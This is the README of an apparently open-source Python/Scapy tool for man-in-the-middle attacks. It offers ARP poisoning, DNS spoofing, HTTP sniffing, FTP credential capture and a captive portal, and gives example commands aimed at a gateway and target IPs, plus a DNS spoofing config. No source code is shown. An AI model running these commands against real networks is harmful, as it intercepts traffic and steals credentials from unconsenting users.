ReddyyZ / mitm.py

Tool developed in Python 3 using Scapy for MITM attacks

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

mitm.py

Tool developed in Python 3 using Scapy for MITM attacks

Project Structure | Installation | Configuring | Examples

πŸ“‚ Project Structure

mitm.py
β”œβ”€β”€ include
|   β”œβ”€β”€ arppoison.py
|   β”œβ”€β”€ ftp_sniff.py
|   └── http_sniff.py
β”œβ”€β”€ requirements.txt
└── mitm.py

Attacks

  • ARP Poisoning
  • FTP Sniffing
  • HTTP Sniffing
  • DNS Spoofing
  • Captive Portal

βš™οΈ Installation

To learn how to install the script, see the wiki Installation

βš™οΈ Configuring

To configure the hosts for DNS Spoofing attacks, you need to change the config/hosts.json, following these instructions:

{
    "kali.ada.": "192.168.1.105",
    "test.root.": "192.168.1.105"
}

Set the key name as the host, and the value as the IP to be redirected. And remember to add the '.' at the end.

πŸ“– Examples

  • Poisoning the ARP and executing DNS Spoofing
python3 mitm.py --arp --dns --gateway 192.168.1.1 --targets 192.168.1.106/192.168.1.104

Remember to change the config/hosts.json file

  • Sniffing all http requests
python3 mitm.py --http -v

All requests will be saved at files directory

  • Sniffing all FTP credentials
python3 mitm.py --ftp -v

All credentials will be saved at files directory

  • Enable Captive Portal
python3 mitm.py --arp --dns --captive --gateway 192.168.1.1 --targets 192.168.1.106

Redirects all requests to your captive portal

</> by ReddyyZ

About

Tool developed in Python 3 using Scapy for MITM attacks


Languages

Language:Python 98.8%Language:Shell 1.2%